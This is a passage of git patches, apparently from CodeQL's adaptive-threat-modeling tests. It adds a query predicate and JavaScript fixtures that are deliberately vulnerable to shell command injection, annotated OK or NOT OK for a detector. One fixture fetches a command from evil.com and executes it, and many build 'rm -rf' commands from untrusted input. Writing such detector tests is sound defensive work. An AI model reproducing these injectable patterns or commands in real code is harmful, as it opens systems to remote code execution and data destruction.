import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm import experimental.adaptivethreatmodeling.XssATM as XssAtm import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm query predicate nosqlFilteredTruePositives(DataFlow::Node endpoint, string reason) { endpoint instanceof NosqlInjection::Sink and @@ -51,3 +53,13 @@ query predicate xssThroughDomFilteredTruePositives(DataFlow::Node endpoint, stri reason = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint) and reason != "argument to modeled function" } + +query predicate shellCommandInjectionFromEnvironmentAtmFilteredTruePositives( + DataFlow::Node endpoint, string reason +) { + endpoint instanceof ShellCommandInjectionFromEnvironment::Sink and + reason = + any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg) + .getAReasonSinkExcluded(endpoint) and + reason != "argument to modeled function" +} From f07984bab2000265a354f55609124a32c3fc7234 Mon Sep 17 00:00:00 2001 From: Jean Helie Date: Fri, 16 Dec 2022 17:34:58 +0100 Subject: [PATCH 310/381] update test data --- .../CommandInjection/child_process-test.js | 95 +++ .../CommandInjection/exec-sh.js | 21 + .../CommandInjection/exec-sh2.js | 16 + .../CommandInjection/execSeries.js | 20 + .../CommandInjection/form-parsers.js | 63 ++ .../CommandInjection/other.js | 35 ++ .../third-party-command-injection.js | 8 + ...ommand-line-parameter-command-injection.js | 147 +++++ .../second-order.js | 53 ++ ...hell-command-injection-from-environment.js | 13 + .../lib/isImported.js | 7 + .../UnsafeShellCommandConstruction/lib/lib.js | 547 ++++++++++++++++++ .../lib/lib2.js | 9 + .../lib/other.js | 5 + .../lib/subLib/amd.js | 6 + .../lib/subLib/amdSub.js | 5 + .../lib/subLib/index.js | 15 + .../lib/subLib2/compiled-file.ts | 5 + .../lib/subLib2/special-file.js | 5 + .../lib/subLib3/my-file.ts | 5 + .../lib/subLib4/index.js | 8 + .../lib/subLib4/subsub.js | 5 + .../UselessUseOfCat/uselesscat.js | 166 ++++++ .../test/update_endpoint_test_files.py | 11 +- 24 files changed, 1267 insertions(+), 3 deletions(-) create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js new file mode 100644 index 00000000000..abc9704a48e --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js @@ -0,0 +1,95 @@ +var cp = require("child_process"), + http = require('http'), + url = require('url'); + +var server = http.createServer(function(req, res) { + let cmd = url.parse(req.url, true).query.path; + + cp.exec("foo"); // OK + cp.execSync("foo"); // OK + cp.execFile("foo"); // OK + cp.execFileSync("foo"); // OK + cp.spawn("foo"); // OK + cp.spawnSync("foo"); // OK + cp.fork("foo"); // OK + + + cp.exec(cmd); // NOT OK + cp.execSync(cmd); // NOT OK + cp.execFile(cmd); // NOT OK + cp.execFileSync(cmd); // NOT OK + cp.spawn(cmd); // NOT OK + cp.spawnSync(cmd); // NOT OK + cp.fork(cmd); // NOT OK + + cp.exec("foo" + cmd + "bar"); // NOT OK + + // These are technically NOT OK, but they are more likely as false positives + cp.exec("foo", {shell: cmd}); // OK + cp.exec("foo", {env: {PATH: cmd}}); // OK + cp.exec("foo", {cwd: cmd}); // OK + cp.exec("foo", {uid: cmd}); // OK + cp.exec("foo", {gid: cmd}); // OK + + let sh, flag; + if (process.platform == 'win32') + sh = 'cmd.exe', flag = '/c'; + else + sh = '/bin/sh', flag = '-c'; + cp.spawn(sh, [ flag, cmd ]); // NOT OK + + let args = []; + args[0] = "-c"; + args[1] = cmd; // NOT OK + cp.execFile("/bin/bash", args); + + let args = []; + args[0] = "-c"; + args[1] = cmd; // NOT OK + run("sh", args); + + let args = []; + args[0] = `-` + "c"; + args[1] = cmd; // NOT OK + cp.execFile(`/bin` + "/bash", args); + + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + + let myArgs = []; + myArgs.push(`-` + "c"); + myArgs.push(cmd); + cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + +}); + +function run(cmd, args) { + cp.spawn(cmd, args); // OK - the alert happens where `args` is build. +} + +var util = require("util") + +http.createServer(function(req, res) { + let cmd = url.parse(req.url, true).query.path; + + util.promisify(cp.exec)(cmd); // NOT OK +}); + + +const webpackDevServer = require('webpack-dev-server'); +new webpackDevServer(compiler, { + before: function (app) { + app.use(function (req, res, next) { + cp.exec(req.query.fileName); // NOT OK + + require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo + }); + } +}); + +import Router from "koa-router"; +const router = new Router(); + +router.get("/ping/:host", async (ctx) => { + cp.exec("ping " + ctx.params.host); // NOT OK +}); \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js new file mode 100644 index 00000000000..b5b8fc602bd --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js @@ -0,0 +1,21 @@ +const cp = require('child_process'), + http = require('http'), + url = require('url'); + +function getShell() { + if (process.platform === 'win32') { + return { cmd: 'cmd', arg: '/C' } + } else { + return { cmd: 'sh', arg: '-c' } + } +} + +function execSh(command, options) { + var shell = getShell() + return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD +} + +http.createServer(function (req, res) { + let cmd = url.parse(req.url, true).query.path; + execSh(cmd); +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js new file mode 100644 index 00000000000..ad91b66f534 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js @@ -0,0 +1,16 @@ +const cp = require('child_process'), + http = require('http'), + url = require('url'); + +function getShell() { + return "sh"; +} + +function execSh(command, options) { + return cp.spawn(getShell(), ["-c", command], options) // BAD +}; + +http.createServer(function (req, res) { + let cmd = url.parse(req.url, true).query.path; + execSh(cmd); +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js new file mode 100644 index 00000000000..25e45d675d9 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js @@ -0,0 +1,20 @@ +var exec = require('child_process').exec; + +function asyncEach(arr, iterator) { + var i = 0; + (function iterate() { + iterator(arr[i++], function () { + if (i < arr.length) + process.nextTick(iterate); + }); + })(); +} + +function execEach(commands) { + asyncEach(commands, (command) => exec(command)); // NOT OK +}; + +require('http').createServer(function(req, res) { + let cmd = require('url').parse(req.url, true).query.path; + execEach([cmd]); +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js new file mode 100644 index 00000000000..4b1dabde441 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js @@ -0,0 +1,63 @@ +var express = require('express'); +var multer = require('multer'); +var upload = multer({ dest: 'uploads/' }); + +var app = express(); +var exec = require("child_process").exec; + +app.post('/profile', upload.single('avatar'), function (req, res, next) { + exec("touch " + req.file.originalname); // NOT OK +}); + +app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { + req.files.forEach(file => { + exec("touch " + file.originalname); // NOT OK + }) +}); + + +var http = require('http'); +var Busboy = require('busboy'); + +http.createServer(function (req, res) { + var busboy = new Busboy({ headers: req.headers }); + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { + exec("touch " + filename); // NOT OK + }); + req.pipe(busboy); +}).listen(8000); + + +const formidable = require('formidable'); +app.post('/api/upload', (req, res, next) => { + let form = formidable({ multiples: true }); + + form.parse(req, (err, fields, files) => { + exec("touch " + fields.name); // NOT OK + }); + + let form2 = new formidable.IncomingForm(); + form2.parse(req, (err, fields, files) => { + exec("touch " + fields.name); // NOT OK + }); +}); + +var multiparty = require('multiparty'); +var http = require('http'); + +http.createServer(function (req, res) { + // parse a file upload + var form = new multiparty.Form(); + + form.parse(req, function (err, fields, files) { + exec("touch " + fields.name); // NOT OK + }); + + + var form2 = new multiparty.Form(); + form2.on('part', function (part) { // / file / field + exec("touch " + part.filename); // NOT OK + }); + form2.parse(req); + +}).listen(8080); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js new file mode 100644 index 00000000000..2e86ace433c --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js @@ -0,0 +1,35 @@ +var http = require("http"), + url = require("url"); + +var server = http.createServer(function (req, res) { + let cmd = url.parse(req.url, true).query.path; + + require("cross-spawn").sync(cmd); // NOT OK + require("execa").shell(cmd); // NOT OK + require("execa").shellSync(cmd); // NOT OK + require("execa").stdout(cmd); // NOT OK + require("execa").stderr(cmd); // NOT OK + require("execa").sync(cmd); // NOT OK + + require("cross-spawn")(cmd); // NOT OK + require("cross-spawn-async")(cmd); // NOT OK + require("exec")(cmd); // NOT OK + require("exec-async")(cmd); // NOT OK + require("execa")(cmd); // NOT OK + require("remote-exec")(target, cmd); // NOT OK + + const ssh2 = require("ssh2"); + new ssh2().exec(cmd); // NOT OK + new ssh2.Client().exec(cmd); // NOT OK + + const SSH2Stream = require("ssh2-streams").SSH2Stream; + new SSH2Stream().exec(false, cmd); // NOT OK + + require("execa").node(cmd); // NOT OK + + require("foreground-child")(cmd); // NOT OK + + const opener = require("opener"); + opener("http://github.com/" + url.parse(req.url, true).query.user); // OK + opener("http://github.com", { command: cmd }); // NOT OK +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js new file mode 100644 index 00000000000..cec3f36aa49 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js @@ -0,0 +1,8 @@ +let https = require("https"), + cp = require("child_process"); + +https.get("https://evil.com/getCommand", res => + res.on("data", command => { + cp.execSync(command); + }) +); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js new file mode 100644 index 00000000000..62aacbfb77a --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -0,0 +1,147 @@ +var cp = require("child_process"); + +(function() { + cp.exec(process.argv); // NOT OK (just weird) + cp.exec(process.argv[0]); // OK + cp.exec("cmd.sh " + process.argv[0]); // OK + cp.exec("cmd.sh " + process.argv[1]); // OK + cp.exec("cmd.sh " + process.argv[2]); // NOT OK + + var args = process.argv.slice(2); + cp.execSync(args[0]); // NOT OK + cp.execSync("cmd.sh " + args[0]); // NOT OK + + var fewerArgs = args.slice(1); + cp.execSync(fewerArgs[0]); // NOT OK + cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + + var arg0 = fewerArgs[0]; + cp.execSync(arg0); // NOT OK + cp.execSync("cmd.sh " + arg0); // NOT OK +}); + +(function() { + const args = process.argv.slice(2); + const script = path.join(packageDir, 'app', 'index.js'); + cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK +}); + +cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. +cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK + +(function () { + var args = require('yargs') // eslint-disable-line + .command('serve [port]', 'start the server', (yargs) => { }) + .option('verbose', { foo: "bar" }) + .argv + + cp.exec("cmd.sh " + args); // NOT OK + + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK +}); + +(function () { + const { + argv: { + ...args + }, + } = require('yargs') + .usage('Usage: foo bar') + .command(); + + cp.exec("cmd.sh " + args); // NOT OK + + var tainted1 = require('yargs').argv; + var tainted2 = require('yargs').parse() + + const {taint1: {...taint1rest},taint2: {...taint2rest}} = { + taint1: tainted1, + taint2: tainted2 + } + + cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + + var {...taint3} = require('yargs').argv; + cp.exec("cmd.sh " + taint3); // NOT OK + + var [...taint4] = require('yargs').argv; + cp.exec("cmd.sh " + taint4); // NOT OK +}); + +(function () { + const argv = process.argv.slice(2); + + var minimist = require("minimist"); + cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + + var subarg = require('subarg'); + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + + var yargsParser = require('yargs-parser'); + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + + import args from 'args' + var flags = args.parse(process.argv); + cp.exec("cmd.sh " + flags.foo); // NOT OK + + var flags = require('arg')({...spec}); + cp.exec("cmd.sh " + flags.foo); // NOT OK +}) + +(function () { + const { ArgumentParser } = require('argparse'); + + const parser = new ArgumentParser({description: 'Argparse example'}); + + parser.add_argument('-f', '--foo', { help: 'foo bar' }); + + cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK +}); + +(function () { + const commandLineArgs = require('command-line-args'); + const options = commandLineArgs(optionDefinitions); + cp.exec("cmd.sh " + options.foo); // NOT OK +}); + +(function () { + const meow = require('meow'); + + const cli = meow(`helpstring`, {flags: {...flags}}); + + cp.exec("cmd.sh " + cli.input[0]); // NOT OK +}); + +(function () { + var dashdash = require('dashdash'); + + var opts = dashdash.parse({options: options}); + + cp.exec("cmd.sh " + opts.foo); // NOT OK + + var parser = dashdash.createParser({options: options}); + var opts = parser.parse(); + + cp.exec("cmd.sh " + opts.foo); // NOT OK +}); + +(function () { + const { program } = require('commander'); + program.version('0.0.1'); + + cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK + cp.exec("cmd.sh " + program.pizzaType); // NOT OK +}); + +(function () { + const { Command } = require('commander'); + const program = new Command(); + program.version('0.0.1'); + + cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK + cp.exec("cmd.sh " + program.pizzaType); // NOT OK +}); \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js new file mode 100644 index 00000000000..f68093d2405 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js @@ -0,0 +1,53 @@ +const express = require("express"); +const app = express(); +const { execFile } = require("child_process"); + +app.get("/", (req, res) => { + const remote = req.query.remote; + execFile("git", ["ls-remote", remote]); // NOT OK + + execFile("git", ["fetch", remote]); // NOT OK + + indirect("git", ["ls-remote", remote]); // NOT OK + + const myArgs = req.query.args; + + execFile("git", myArgs); // NOT OK + + if (remote.startsWith("--")) { + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + } else { + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option + } + + if (remote.startsWith("git@")) { + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL + } else { + execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + } + + execFile("git", req.query.args); // NOT OK - unknown args + + execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code + + execFile("git", ["add", req.query.remote].concat([otherargs()])); // OK - git add is not a command that can be used to execute arbitrary code + + execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. + + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + + // hg + execFile("hg", ["clone", req.query.remote]); // NOT OK + + execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + + execFile("hg", req.query.args); // NOT OK - unknown args + + execFile("hg", ["clone", "--", req.query.remote]); // OK +}); + +function indirect(cmd, args) { + execFile(cmd, args); // - OK - ish, the vulnerability not reported here +} + +app.listen(3000, () => console.log("Example app listening on port 3000!")); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js new file mode 100644 index 00000000000..0d610b1e9dd --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -0,0 +1,13 @@ +var cp = require('child_process'), + path = require('path'), + execa = require("execa"); +(function() { + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + + const safe = "\"" + path.join(__dirname, "temp") + "\""; + execa.shellSync('rm -rf ' + safe); // OK +}); diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js new file mode 100644 index 00000000000..116b624615b --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js @@ -0,0 +1,7 @@ +// is imported from lib.js + +const cp = require("child_process"); + +module.exports.thisMethodIsImported = function (name) { + cp.exec("rm -rf " + name); // NOT OK +} \ No newline at end of file diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js new file mode 100644 index 00000000000..64b279d7d05 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js @@ -0,0 +1,547 @@ +var cp = require("child_process") + +module.exports = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + cp.execFile(name, [name]); // OK + cp.execFile(name, name); // OK +}; + +module.exports.foo = function (name) { + cp.exec("rm -rf " + name); // NOT OK +} + +module.exports.foo.bar = function (name) { + cp.exec("rm -rf " + name); // NOT OK +} + +function cla() { } +cla.prototype.method = function (name) { + cp.exec("rm -rf " + name); // NOT OK +} +module.exports = new cla(); + + +function cla2() { } +cla2.prototype.method = function (name) { + cp.exec("rm -rf " + name); // NOT OK +} +module.exports.bla = new cla2(); + +module.exports.lib2 = require("./lib2.js") + +class Cla3 { + constructor(name) { + cp.exec("rm -rf " + name); // NOT OK + } + static foo(name) { + cp.exec("rm -rf " + name); // NOT OK + } + bar(name) { + cp.exec("rm -rf " + name); // NOT OK + + cp.exec("rm -rf " + notASource); // OK + } +} + +module.exports.cla3 = Cla3; + +module.exports.mz = function (name) { + require("mz/child_process").exec("rm -rf " + name); // NOT OK. +} + +module.exports.flow = function (name) { + var cmd1 = "rm -rf " + name; // NOT OK. + cp.exec(cmd1); + + var cmd2 = "rm -rf " + name; // NOT OK. + function myExec(cmd) { + cp.exec(cmd); + } + myExec(cmd2); +} + +module.exports.stringConcat = function (name) { + cp.exec("rm -rf " + name); // NOT OK. + + cp.exec(name); // OK. + + cp.exec("for foo in (" + name + ") do bla end"); // OK. + + cp.exec("cat /foO/BAR/" + name) // NOT OK. + + cp.exec("cat \"" + name + "\"") // NOT OK. + + cp.exec("cat '" + name + "'") // NOT OK. + + cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + + cp.exec(name + " some file") // OK. +} + +module.exports.arrays = function (name) { + cp.exec("rm -rf " + name); // NOT OK. + + var args1 = ["node"]; + args1.push(name); // NOT OK. + cp.exec(args1.join(" ")); + + cp.exec(["rm -rf", name].join(" ")); // NOT OK. + + cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. + + cp.execFile("rm", ["-rf", name]); // OK +} + +var util = require("util"); +module.exports.format = function (name) { + cp.exec(util.format("rm -rf %s", name)); // NOT OK + + cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + + cp.exec(util.format("%s foo/bar", name)); // OK + + cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + + cp.exec(require("printf")('rm -rf %s', name)); // NOT OK +} + +module.exports.valid = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (!isValidName(name)) { + return; + } + cp.exec("rm -rf " + name); // OK +} + +module.exports.safe = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (!isSafeName(name)) { + return; + } + cp.exec("rm -rf " + name); // OK +} + +class Cla4 { + wha(name) { + cp.exec("rm -rf " + name); // NOT OK + } + + static bla(name) { + cp.exec("rm -rf " + name); // OK - not exported + } + constructor(name) { + cp.exec("rm -rf " + name); // OK - not exported + } +} +module.exports.cla4 = new Cla4(); + +function Cla5(name) { + cp.exec("rm -rf " + name); // OK - not exported +} +module.exports.cla5 = new Cla5(); + +module.exports.indirect = function (name) { + let cmd = "rm -rf " + name; // NOT OK + let sh = "sh"; + let args = ["-c", cmd]; + cp.spawn(sh, args, cb); +} + +module.exports.indirect2 = function (name) { + let cmd = name; + let sh = "sh"; + let args = ["-c", cmd]; + cp.spawn(sh, args, cb); // OK + + let cmd2 = "rm -rf " + name; + var args2 = [cmd2]; + cp.spawn( + 'cmd.exe', + ['/C', editor].concat(args2), + { stdio: 'inherit' } + ); +} + +module.exports.cmd = function (command, name) { + cp.exec("fo | " + command); // OK + + cp.exec("fo | " + name); // NOT OK + +} + +module.exports.sanitizer = function (name) { + var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" + cp.exec("rm -rf " + sanitized); // OK + + var broken = "'" + name.replace(/'/g, "'\''") + "'" + cp.exec("rm -rf " + broken); // NOT OK +} + +var path = require("path"); +module.exports.guard = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (!path.exist(name)) { + cp.exec("rm -rf " + name); // NOT OK + return; + } + cp.exec("rm -rf " + name); // OK +} + +module.exports.blacklistOfChars = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (/[^A-Za-z0-9_\/:=-]/.test(name)) { + cp.exec("rm -rf " + name); // NOT OK + } else { + cp.exec("rm -rf " + name); // OK + } +} + +module.exports.whitelistOfChars = function (name) { + cp.exec("rm -rf " + name); // NOT OK + + if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { + cp.exec("rm -rf 